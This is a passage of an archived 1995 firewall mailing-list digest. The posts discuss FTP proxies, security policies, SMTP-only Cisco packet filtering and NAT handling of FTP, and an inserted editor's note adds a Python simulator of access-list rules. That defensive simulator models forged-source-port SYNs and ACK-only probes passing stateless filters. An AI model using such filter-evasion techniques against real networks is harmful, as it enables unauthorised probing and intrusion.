McGuckin) > > I need a windows FTP client that can do SNK authentication. > I want to use it with the FWTK ftp-gw proxy. > > The problem is that most of the gui based windows FTP > clients don't have a command line or a logging window to view > status messages, etc. > > Any suggestions? > Try WS_FTP from Ipswitch (http://www.ipswitch.com). It is firewall aware and works well with FWTK ftp-gw proxy. It has a full logging window and can be run with command line parameters. > John Kidston j.kidston@citec.qld.gov.au CITEC voice: +61 7 2222356 fax: +61 7 2277890 317 Edward Street, Brisbane 4000, Australia "My opinions and CITEC's are not always the same." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Thu Oct 5 18:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16766 for firewalls-outgoing; Thu, 5 Oct 1995 17:47:23 -0700 Received: from furnace.cybergraphic.com.au ([203.5.40.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA16759 for ; Thu, 5 Oct 1995 17:47:18 -0700 Received: from mailgate.cybergraphic.com.au (mailgate.cybergraphic.com.au [203.5.40.130]) by furnace.cybergraphic.com.au (8.6.12/8.6.12) with SMTP id KAA01718; Fri, 6 Oct 1995 10:43:14 +1000 Received: from cc:Mail by mailgate.cybergraphic.com.au id AA813001359; Fri, 06 Oct 95 10:38:49 eet Date: Fri, 06 Oct 95 10:38:49 eet From: "greg hume" Message-Id: <9509068130.AA813001359@mailgate.cybergraphic.com.au> To: parks@xdiv.lanl.gov, firewalls@greatcircle.com Subject: Re: requests for Security policys Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Parks, On Thu, 5 Oct 1995, Parks Fields wrote: >Hello world, >I know the basic of security is a good security policy. I have >created a security policy but I am not 100% happy with it. Could some >of you >send me a copy of yours so I can figure out what mine is missing? >Thank you. 
The official response by most may be as follows

1) don't send out our security policy to anyone
2) deleted because of 1) ;-)

On a more serious note, various books on firewalls have good sections on going about designing a security policy. Cheswick and Bellovin, Firewalls and Internet Security (Addison-Wesley Publishing), has been an invaluable reference source for us. Our policy was designed and then agreed upon before the technology was looked at, i.e. taking a leaf from my Business Systems Analysis hat. We designed it based on what the business wanted to achieve. This allowed us to apply current and future technology to a well defined business need. We then applied the technology (Fire wall, routers, client applications, access rules etc..). Then we designed the business processes required to maintain the security level. After all, the firewall and those that have the responsibility to maintain it are now (at least from our company's perspective) performing a business critical function. The biggest problem that needs to be overcome is getting management to sign on the dotted line. Without the policy being adopted high enough up in the organisational structure, the ability to maintain the required security level (from a business perspective) is sure to be watered down. Do as much Analysis as you can within the time they (management) will allow. I wish I had the information contained in Alan Dowd's responses to this query when I got my fingers burnt (-: Good luck Greg. Senior Systems/Network Analyst Cybergraphic Systems PTY LTD 862 Glenferrie Rd.
Hawthorn Melbourne, Australia 3122 From firewalls-owner Thu Oct 5 18:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA16974 for firewalls-outgoing; Thu, 5 Oct 1995 18:00:14 -0700 Received: from uu6.psi.com (uu6.psi.com [38.145.155.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA16960 for ; Thu, 5 Oct 1995 18:00:05 -0700 Received: from mony.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA23757 for ; Thu, 5 Oct 95 20:35:11 -0400 Received: by mony.com (Smail3.1.28.1 #3) id ;Thu, 5 Oct 1995 18:33 EDT Received: by monygmc.mony.com (1.37.109.14/15.6) id AA213942361; Thu, 5 Oct 1995 18:32:41 -0400 From: David Kozinn Message-Id: <199510052232.AA213942361@monygmc.mony.com> Subject: Packet filtering OK for mail-only connection? To: firewalls@GreatCircle.com Date: Thu, 5 Oct 1995 18:32:41 -0400 (EDT) Reply-To: david@monygmc.mony.com X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1881 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm going to be assisting with the implementation of a "mail-only" connection to the Internet shortly. By "mail-only" I mean that while there will be a router connected to an ISP via a leased line, the only traffic that we want to permit will be SMTP traffic to a specific machine designated as our "mail gateway" server. The only other traffic allowed will be to support DNS so that the gateway machine (only) can find the proper host to connect to for outbound traffic. I've just finished reading the FAQ and Brent Chapman's paper on Packet Filtering, and I'm starting to better understand the issues involved. What we would like to do, initially, is to set up a router (which will probably be a Cisco 2501) to do packet filtering as Brent's described in his paper, to allow for this mail-only connection to a machine on our internal network. 
Eventually, we will add in a dedicated firewall machine between the inbound router and the internal network, but we'd like to put that step off for a while if we can be reasonably safe without doing that. What I'd like to know is this: Is the Cisco 2501 capable of filtering based on source port (not just source address) so that I can block incoming packets that aren't (apparently) coming from the remote SMTP server? Does the router provide for blocking start-of-connection packets so that a remote system can't use port 25 to launch an attack as described in Brent's paper? If this router won't do the trick, would a simple (hah!) firewall/mail gateway "between" the Internet, behind a filtering router, and the internal network, which could "see" the internal network, do the trick? What else should I be concerned with? TIA.........David -- David Kozinn dkozinn@csc.com / david@mony.com Computer Sciences Corporation Under contract to Mutual of New York Technology Management Group +1-201-907-6990 From firewalls-owner Thu Oct 5 20:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA18729 for firewalls-outgoing; Thu, 5 Oct 1995 20:01:58 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA18722 for ; Thu, 5 Oct 1995 20:01:51 -0700 Date: Thu, 5 Oct 95 22:52 EDT From: Jack Holleran Subject: 18th National Information Systems Security Conference To: firewalls@GREATCIRCLE.COM Message-ID: <951006025217.884121@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Event: 18th National Information Systems Security Conference Theme: Making Security Real Dates: October 10-13, 1995 Place: Baltimore Convention Center, Baltimore Maryland Cost: $280 Sponsors: National Institute of Standards and Technology National Computer Security Center Registration: On-site This is a reminder that the Government is not closed and the annual National 
Information Systems Security Conference is going to happen. We expect over 2200 attendees this year. Below is a list of the sessions and topics being discussed in a formal 6-7 concurrent track program. Below that list is a partial list of speakers at this conference. We and they invite you to attend. If you are serious about Information Security, this conference is indeed the place to learn from peers and experts.

Sessions include: Research for the Future, High Speed ATM Networks, Secure DBMS Panel, Security Policy I & II, Security in Infinite Networks, Application Challenges, New Baselines, Cryptographic Application Program Interfaces, Intrusion Detection, and The Future of Formal Methods for Security.

NCSC and NIST Products and Services, Building a MLS System: A Real Life Adventure, Trusted Products I & II, Information Systems Security Research Joint Technology Office, Developing an Incident Handling Capability, An Assurance Framework or Can Process replace Evaluation, Network Rating Model, Case Studies I & II, and Contingency in Action.

The TMACH Experiment, Common Criteria Editorial Board, The New OMB A-130, Appendix III, Internet Security Evaluation & Assurance, Trusted Products - How they are Used, Trusted Technology Assessment Program, The Development of Generally Accepted System Security Principles, Key Escrow, Evaluation Criteria I & II, and Security Issues for Electronic Commerce.

Continuous Process Improvement, INFOSEC Security Market, Encipherment, Metrics, Architectures, Will Encryption keep Out the Hackers, Security Plans, Requirements vs. Solutions, two (2) NII Security Initiative sessions, and INFOSEC, Prepare to Meet the New Millennium.
Computer Crime on the Internet, Legal Issues, Computer Forensics and Law Enforcement, Advanced Educational Opportunities, Current Threats and Practical Solutions, The INTERNET: Problems and Solutions; Weaknesses and Vulnerabilities; Tools and Defenses; Implementing Solutions; Maintenance of Security; and, Information Warfare: Its Impact Upon Information Security.

Introduction to Computer Security, Trusted Systems Concepts, Introduction to the Insecurity of the Internet, Trusted Networks, Security Engineering Principles, System Engineering CMM, two (2) unique Database Security Tutorials, A How to on Awareness and Training, How to Teach Information Security, and From Training Standards to Courseware.

MISSI (2 sessions and a workshop), A Tutorial: The Internet, World-Wide Web, and Beyond, and Building Countermeasure Tools.

Some of the Speakers: Marjory Blumenthal, Dennis Branstad, Jon David, Marc Andreesen, Scott Charney, Dorothy Denning, Lance Hoffman, Marc Rotenberg, Marc Pollitt, Ken Rowe, Gene Troy, Kevin Zeiss, Ed Springer, Mike Nelson, Marshall Abrams, Steve Walker, Gene Schultz, Steve Bellovin, Bill Cheswick, Harold Highland, Joel Sachs, Bill Cook, Marv Schaefer, Matt Bishop, Paul Ferguson, Padgett Peterson, Wayne Madsen, Dave Banisar, Peter Neumann, Corey Schou, Jim Bidzos, and Gene Spafford. This is a list of less than 10% of the speakers at this year's conference.
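[Editor's note, not part of any message in this digest.] The access-list exchange earlier in this digest between Ilias Liakopoulos and Colin Campbell, and Tony Li's warning later on about trusting the source port, are easier to check in code than on paper. The simulator below is an added example written for this page; it is not code from the list or from any of the posters, and it is not Cisco's. It models an IOS extended access-list as a stateless first-match filter with an implicit deny, treats `established` as "ACK bit set", and uses the invented hosts from the question (1.2.3.4 remote, 2.2.3.4 local mailhost); the port numbers, the assumption that the mailhost is the only inside host, and all function and variable names are mine.

```python
"""Stateless access-list simulator for the SMTP-only filter discussed on the list.

Added example, not code from the firewalls list or any poster.  1.2.3.4 and
2.2.3.4 are the invented addresses from the original question; everything
else here (ports, rule encoding, names) is an assumption made for illustration.
"""
from dataclasses import dataclass

MAILHOST = "2.2.3.4"    # local mail gateway (from the question)
REMOTE = "1.2.3.4"      # some host out on the Internet (from the question)
INSIDE = {MAILHOST}     # hosts behind the router (assumption: only the mailhost)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    ack: bool           # False only for the very first SYN of a connection


@dataclass(frozen=True)
class Rule:
    """One 'access-list N permit tcp <src> <sport> <dst> <dport> [established]'."""
    src: str            # host address or 'any'
    sport: tuple        # ('any',), ('eq', n) or ('gt', n)
    dst: str
    dport: tuple
    established: bool = False


def _host_ok(pattern, addr):
    return pattern == "any" or pattern == addr


def _port_ok(spec, port):
    op = spec[0]
    if op == "any":
        return True
    if op == "eq":
        return port == spec[1]
    if op == "gt":
        return port > spec[1]
    raise ValueError(op)


def evaluate(acl, pkt):
    """First matching permit wins; an IOS list ends in an implicit deny."""
    for r in acl:
        if (_host_ok(r.src, pkt.src) and _port_ok(r.sport, pkt.sport)
                and _host_ok(r.dst, pkt.dst) and _port_ok(r.dport, pkt.dport)
                and (pkt.ack or not r.established)):
            return "permit"
    return "deny"


# The original question: one list, applied 'out' on the inside interface, so it
# only ever sees packets travelling from the Internet towards the mailhost.
ORIGINAL_102 = [
    Rule(REMOTE, ("any",), MAILHOST, ("any",), established=True),
    Rule(REMOTE, ("any",), MAILHOST, ("eq", 25)),
]


def original_policy(pkt):
    if pkt.src in INSIDE:
        return "permit"                  # nothing filters traffic leaving the site
    return evaluate(ORIGINAL_102, pkt)


# Colin's answer: an incoming filter on each interface, ports named at both ends.
ACL_101 = [  # 'in' on the outside interface
    Rule("any", ("gt", 1023), MAILHOST, ("eq", 25)),                    # (1)
    Rule("any", ("eq", 25), MAILHOST, ("gt", 1023), established=True),  # (2)
]
ACL_102 = [  # 'in' on the inside interface
    Rule(MAILHOST, ("gt", 1023), "any", ("eq", 25)),                    # (3)
    Rule(MAILHOST, ("eq", 25), "any", ("gt", 1023)),                    # (4)
]


def two_interface_policy(pkt):
    return evaluate(ACL_102 if pkt.src in INSIDE else ACL_101, pkt)


def connection_works(policy, client, cport, server, sport):
    """A TCP connection needs both the SYN and the SYN/ACK to get through."""
    syn = Packet(client, cport, server, sport, ack=False)
    syn_ack = Packet(server, sport, client, cport, ack=True)
    return policy(syn) == "permit" and policy(syn_ack) == "permit"


def matrix(policy):
    """Which of the four connections that matter the policy lets through."""
    return {
        "inbound smtp": connection_works(policy, REMOTE, 4000, MAILHOST, 25),
        "outbound smtp": connection_works(policy, MAILHOST, 4001, REMOTE, 25),
        "inbound telnet": connection_works(policy, REMOTE, 4002, MAILHOST, 23),
        "outbound telnet": connection_works(policy, MAILHOST, 4003, REMOTE, 23),
    }


# A list that trusts the source port alone, without 'established'.
SOURCE_PORT_ONLY = [Rule("any", ("eq", 25), "any", ("any",))]


def crafted_syn_passes(acl):
    """A SYN to the telnet port, forged with source port 25."""
    return evaluate(acl, Packet(REMOTE, 25, MAILHOST, 23, ack=False)) == "permit"


if __name__ == "__main__":
    print("original     ", matrix(original_policy))
    print("two-interface", matrix(two_interface_policy))
    print("source-port-only list passes forged SYN:", crafted_syn_passes(SOURCE_PORT_ONLY))
    print("list 101 with 'established' passes it:  ", crafted_syn_passes(ACL_101))
```

Running it reproduces the symptom from the question: with the single outbound list, outbound telnet from the mailhost works because the returning SYN/ACK matches the host-to-host `established` line, and dropping that line breaks SMTP because the returning port-25 packets no longer match anything. Colin's four rules allow exactly inbound and outbound SMTP. The last two checks are Tony Li's point: a rule keyed only on source port 25 passes a forged SYN to any port, while rule (2) does not, because the SYN carries no ACK. Two caveats the simulator makes visible: `established` is a stateless check of the ACK/RST bits, so a crafted ACK-only packet to a high port on the mailhost still gets through (it cannot open a connection, but it can probe); and rule (4) as posted has no `established`, so it also passes SYNs that the mailhost itself originates from port 25, which only matters if the mailhost is compromised.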
From firewalls-owner Thu Oct 5 22:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA19820 for firewalls-outgoing; Thu, 5 Oct 1995 21:31:06 -0700 Received: from aurora.cdev.com (aurorax.cdev.com [160.207.114.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA19813 for ; Thu, 5 Oct 1995 21:31:02 -0700 Message-Id: <199510060431.VAA19813@miles.greatcircle.com> Received: from cdicisco5.cdev.com by aurora.cdev.com id SMTP-0013074b0f4008400; Thu, 5 Oct 95 23:30:46 -0500 X-Sender: djs3wn39@aurora.cdev.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 05 Oct 1995 20:13:13 -0700 To: meyerd@post.med.uni-marburg.de From: Donald.J.Smith@.cdev.com (Donald J Smith) Subject: http-gw & tis Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>From: "D.A. Meyer"
>Date: Thu, 5 Oct 1995 10:12:43 +0000
>Subject: http-gw on dual-homed gateways
>
>Hi,
>my question of the day is: has anybody tried to run TIS http-gw on a
>dual-homed gateway?

yes

>The proxy has to rewrite the URL, and it seems to do it using the
>outside interface name/address (gethostname + gethostbyname). When I
>change the hostname so that it is connected to the IP-Address of the
>internal interface, my mail-proxy won't work.
>Has anybody built a patch, which rewrites the address depending on the
>interface on which the client-request came in? Any other idea?
>

I went into the code and hardcoded the name of my inside interface. This will probably only work in one direction, but that's all I need. I'm only proxying out. NO ins. (This took about 5 minutes to fix but a day to figure out what was happening ;-)

>Thanx
>Dirk
>- -----------------------------------------------------------------
>Dirk A.
Meyer meyerd@mailer.uni-marburg.de Donald J Smith Network Security Engineer @Computing Devices International "@begin design in the security and ease_of_use != A*(1/Data_Security)" (my opinions are mine and so are the spelling errors ;-) From firewalls-owner Thu Oct 5 23:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA21726 for firewalls-outgoing; Thu, 5 Oct 1995 23:01:37 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA21719 for ; Thu, 5 Oct 1995 23:01:31 -0700 Date: Fri, 6 Oct 95 01:58 EDT From: Jon David Subject: Clarification/expansion To: Firewalls@GREATCIRCLE.COM Message-ID: <951006055811.235375@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Jack Holleran's posting regarding the 18th National Information Systems Security Conference was a tad on the disorganized side. Of particular interest to readers of this group, well hidden in the list of topics is the fact that a full day (4 consecutive sessions) will be devoted to various aspects of Internet security. The first session will deal with weaknesses and vulnerabilities of the Internet, and will be given by Padgett Peterson. Bill Cheswick and Steve Bellovin will handle the 2nd session dealing with tools. The afternoon will start with Paul Ferguson dealing with setting up proper security, and the final session will have Marcus Ranum and Sarah Gordon discussing the ways to keep your system secure. (Marcus and Sarah didn't make the sample list of speakers in Jack's posting.) Even though each session will have only 1 or 2 speakers, the entire panel will be available for Q&A, and a private room is available for between session discussions of a more personal nature. And, while each session is presented as a stand-alone event, the full sequence is recommended to cover the necessary aspects of Internet security.
For those that may be in the novice class, Dr. Harold Highland will be giving an introductory level tutorial the day before. (Since this is Brent's group, be assured he was asked to participate in these sessions. His schedule wouldn't permit him to do so, but he was good enough to send some advertising literature on his seminars which will be given out at the sessions. :-) Jon PS: Do N-O-T contact me for any additional information, contact the man (Holleran@dockmaster.ncsc.mil) who made the original posting. _ _ _ | | | | | | "You don't have to agree with me just because I'm right." ^^^^^^^^^^^ | + + | Jon David PC Security 145 Howard Avenue | + + | President LAN Security Tappan, NY 10983 | _ | The FORTRESS Internet Security U S A | | | | ----\ \--- (914)365-4700 fortress@dockmaster.ncsc.mil From firewalls-owner Fri Oct 6 02:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA25005 for firewalls-outgoing; Fri, 6 Oct 1995 02:05:55 -0700 Received: from greatdane.cisco.com (greatdane.cisco.com [171.69.1.141]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA24998 for ; Fri, 6 Oct 1995 02:05:46 -0700 Received: (tli@localhost) by greatdane.cisco.com (8.6.8+c/8.6.5) id CAA00830; Fri, 6 Oct 1995 02:04:12 -0700 Date: Fri, 6 Oct 1995 02:04:12 -0700 From: Tony Li Message-Id: <199510060904.CAA00830@greatdane.cisco.com> To: david@monygmc.mony.com (David Kozinn) Cc: firewalls@GreatCircle.COM Subject: Packet filtering OK for mail-only connection? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What I'd like to know is this: Is the Cisco 2501 capable of filtering based on source port (not just source address) so that I can block incoming packets that aren't (apparently) coming from the remote SMTP server? Yes. However, we strongly suggest that you not delude yourself into thinking that a cracker cannot attack using the SMTP well known port as the source port. 
It would take someone maybe 30 seconds extra to do this. Filtering on destination port is the only sane approach. Does the router provide for blocking start-of-connection packets so that a remote system can't use port 25 to launch an attack as described in Brent's paper? Yes, if you only want to allow outbound connections you can certainly do that. Look at the "established" keyword. Tony From firewalls-owner Fri Oct 6 02:30:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA24946 for firewalls-outgoing; Fri, 6 Oct 1995 02:01:03 -0700 Received: from server2.dh.ixe.net (server2.dh.ixe.net [205.244.44.71]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA24918 for ; Fri, 6 Oct 1995 02:00:53 -0700 Received: from nemesis.UUCP (Unemesis@localhost) by server2.dh.ixe.net (8.6.11/8.6.11) with UUCP id JAA24042; Fri, 6 Oct 1995 09:59:10 +0100 Received: from orbit.usn.nl by nemesis.usn.nl with smtp (Smail3.1.28.1 #15) id m0t17de-0005C3C; Fri, 6 Oct 95 09:56 MESZ Message-Id: Date: Fri, 06 Oct 1995 10:59:47 -0500 From: "N.W. van der Lugt" Reply-To: "N.W. van der Lugt" Subject: Re: FTP FW solution To: Paul A Vixie , firewalls@GreatCircle.COM In-Reply-To: <9510042047.AA27158@wisdom.home.vix.com> X-Mailer: EMBLA 1.1 Demo MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk firewalls-owner@GreatCircle.COM: > > environment; YMMV) includes code to parse FTP packets and alter the > > PORT lines, and similar support for talk is pending. > > I guess I thought this would have gone without saying, but I don't agree > with the idea of modifying PORT verbs in stream -- this is a very slippery > slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary > address assignments, and accomplishes its goals without any layering > violations -- in particular the user data is never interpreted. 
This goes > to show that it can be done without searching for PORT verbs in user data.

So 'NAT does FTP proxying' and this 'without searching for PORT verbs in user data'? Not right. The FTP proxy, of course, will look at user data. A proxy *IS* Layering Violation #1. We now have the Linux solution (searching and modifying part of the data stream) vs the proxy solution (searching all of the data stream, re-implementing the entire FTP protocol, and sending out its own data). I prefer the packet filtering methods - generic solutions. With FTP, as we have seen, one should examine the data stream. Thus, the best solution (used by well-known fw) is to combine the two and create a virtual back-connection accept 'rule' when the FTP port command comes by. Klaas (klaas@usn.nl - disclaimers apply)

From firewalls-owner Fri Oct 6 07:30:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA29826 for firewalls-outgoing; Fri, 6 Oct 1995 07:04:14 -0700 Received: from pony-express.ims.advantis.com (pony-express.ims.advantis.com [165.87.194.144]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA29819 for ; Fri, 6 Oct 1995 07:04:11 -0700 Received: (from uucp@localhost) by pony-express.ims.advantis.com (8.6.9/8.6.9) id JAA29263; Fri, 6 Oct 1995 09:58:16 -0400 Received: from pangloss.ims.advantis.com(164.120.180.21) by pony-express.ims.advantis.com via smap (V1.3) id sma075083; Fri Oct 6 09:58:14 1995 Received: by pangloss.ims.advantis.com (AIX 3.2/UCB 5.64/4.03) id AA62795; Fri, 6 Oct 1995 10:02:43 -0400 Date: Fri, 6 Oct 1995 10:02:43 -0400 (EDT) From: "Henry W.
Farkas" To: Andrew & Terri Forster Cc: firewalls@GreatCircle.COM Subject: Re: Copy of RFC1597 In-Reply-To: <9510051838.AA17881@ns2.emirates.net.ae> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- On Thu, 5 Oct 1995, Andrew & Terri Forster wrote: > Being new to the net ( only being in the UAE ) since August I'm interested in > locating a copy of RFC1597. Any assistance as to where I can find it would be > appreciated. Try my security page, if you have web access: http://newstand.ims.advantis.com/henry/security.html You can search or download RFCs from there. =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas@ims.advantis.com |------------------------------------------------ hfarkas@vnet.ibm.com | http://newstand.ims.advantis.com/henry henry@nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Why use cryptography? "Because it's still legal for Americans to hold private conversations." - Phil Zimmermann - Let's keep it that way.
=========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMHU27KDthkLkvrK9AQE5/wP+LnpsyQXolu1PUEU31Ei2YEZ/AsBAMzrT z3UTm9mUM71IMi+p705b5SgQMfz2hGkUOqnsPnaXpXvT26TXCRO7Vu7E+G6r24xB E5iOpEIk2w1wifRnJcZlT3QVL8oCDzRY+XqbTfQnTpBuUrl6Qo6s1GYhOQU2d/zE 3H0xdvo/EvA= =dXNB -----END PGP SIGNATURE----- From firewalls-owner Fri Oct 6 09:00:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02904 for firewalls-outgoing; Fri, 6 Oct 1995 08:39:44 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA02890 for ; Fri, 6 Oct 1995 08:39:39 -0700 Received: from uucp3.UU.NET by relay3.UU.NET with SMTP id QQzkhi21848; Fri, 6 Oct 1995 11:38:13 -0400 Received: from fmrco.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Fri, 6 Oct 1995 11:38:13 -0400 Received: from ocean.fmrco.com by fmrco.com (4.1/SMI-4.1) id AA22227; Fri, 6 Oct 95 08:27:12 EDT Received: from capstan by ocean.fmrco.com (4.1/SMI-4.1) id AA04821; Fri, 6 Oct 95 08:26:23 EDT From: fmrco!ocean!ajl@uunet.uu.net (Andrew Luca) Received: by capstan (4.1/Spike-2.1) id AA08000; Fri, 6 Oct 95 08:26:22 EDT Date: Fri, 6 Oct 95 08:26:22 EDT Message-Id: <9510061226.AA08000@capstan> To: uunet!jsc.nasa.gov!mark.horn1@uunet.uu.net Cc: uunet!GreatCircle.COM!firewalls@uunet.uu.net In-Reply-To: (message from uunet!jsc.nasa.gov!mark.horn1 on 4 Oct 1995 16:02:26 U) Subject: Re: Technical details of NT Dom Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: uunet!jsc.nasa.gov!mark.horn1 Date: 4 Oct 1995 16:02:26 U X-Mailer: Mail*Link SMTP/QM 3.0.0 Mail*Link(r) SMTP Technical details of NT Domains.. Hello, We have some users who need to login to a windows NT domain that has been set up here. We currently have an IP firewall installed. This firewall is installed on our LAN and protects us from the Internet. 
Since firewalls-owner@GreatCircle.COM Precedence: bulk {Much text deleted to save digital trees} In order to make this work, you need to be forwarding udp broadcast packets on udp ports 137 and 138. This is how the MSW domain system finds a domain controller to authenticate you and log on. Andrew. From firewalls-owner Fri Oct 6 09:01:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03298 for firewalls-outgoing; Fri, 6 Oct 1995 08:55:01 -0700 Received: from firat.bcc.bilkent.edu.tr (firat.bcc.bilkent.edu.tr [139.179.10.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03285 for ; Fri, 6 Oct 1995 08:54:02 -0700 Received: by bilkent.edu.tr (5.65c/IDA-1.4) id AA11837; Fri, 6 Oct 1995 09:55:06 +0300 From: akgul@bilkent.edu.tr (Mustafa Akgul) Message-Id: <199510060655.AA11837@firat.bcc.bilkent.edu.tr> Subject: Re: Copy of RFC1597 To: bnowlin@nyjets.lerc.nasa.gov (Ben Nowlin) Date: Fri, 6 Oct 1995 09:55:05 +0300 (EET) Cc: forster@ns2.emirates.net.ae, firewalls@GreatCircle.COM In-Reply-To: <199510051945.PAA15839@nyjets.lerc.nasa.gov> from "Ben Nowlin" at Oct 5, 95 03:45:50 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 322 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

To get a copy of rfc1597.txt by email write to bilkent-server@bilkent.edu.tr in the body

    begin
    send rfc1597.txt
    dir INFO/rfc
    send HELP
    end

dir INFO/rfc will give you list of available rfc at Bilkent, and HELP is help-file of the mail server software.
Best regards Mustafa Akgul Bilkent University Ankara From firewalls-owner Fri Oct 6 09:30:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03332 for firewalls-outgoing; Fri, 6 Oct 1995 08:58:06 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA03325 for ; Fri, 6 Oct 1995 08:58:01 -0700 Message-Id: <199510061558.IAA03325@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA066644970; Sat, 7 Oct 1995 01:56:10 +1000 From: Darren Reed Subject: Re: Network Address Translation stuff To: paul@vix.com (Paul A Vixie) Date: Sat, 7 Oct 1995 01:56:10 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510050656.AA27394@wisdom.home.vix.com> from "Paul A Vixie" at Oct 4, 95 11:56:32 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1172 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Paul A Vixie, sie said: > > > I still don't think that even IBM can do address translation > > without modifying FTP PORT command: you either modify PORT command > > packet-per-packet (as NAT:s seem to do) or you re-create necessary > > commands (as FTP proxy's do it). > > The trick is to use an FTP proxy without the client having to know that > it's talking to an FTP proxy. With a simple DNS trick and a complicated > FTP proxy, you can make these ends meet. > > The thought of modifying PORT verbs in-stream makes my skin crawl. You don't want to look at what the Linux port has done...(someone was raving about Linux, or they will given the chance). It's a surprise it even works (just RTFS for 1.3.31). And just to remind people, the 1.3.* kernels for Linux are development only - use of 1.2.* is recommended for production - this code isn't in 1.2.*. 
Having looked at the code, it only convinces me that using ftp-gw is by far the better thing to do, especially considering the options available to control ftp-gw cf. modifying PORT commands in the kernel. I hope the commercial products which do this look a lot better... darren From firewalls-owner Fri Oct 6 09:30:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03339 for firewalls-outgoing; Fri, 6 Oct 1995 08:58:17 -0700 Received: from pina1.telecom.at (pina1.telecom.at [194.37.252.41]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA03311 for ; Fri, 6 Oct 1995 08:57:52 -0700 Received: from pina2.telecom.at (pina2.telecom.at [194.37.252.42]) by pina1.telecom.at (8.6.10/8.6.6) with ESMTP id QAA34343 for ; Fri, 6 Oct 1995 16:47:24 +0100 Received: (from ilias@localhost) by pina2.telecom.at (8.6.10/8.6.6) id QAA14400 for firewalls@GreatCircle.COM; Fri, 6 Oct 1995 16:53:46 +0100 From: Ilias Liakopoulos Message-Id: <199510061553.QAA14400@pina2.telecom.at> Subject: Re: cisco router extended access-list question ( -> solved ) To: firewalls@GreatCircle.COM Date: Fri, 6 Oct 1995 16:53:46 +0100 (MEZ) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1564 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi ! my question was:

> I have set up an access-list like the example in UnileverCD
> for allowing only SMTP connections (the IP addrs are invented):
>
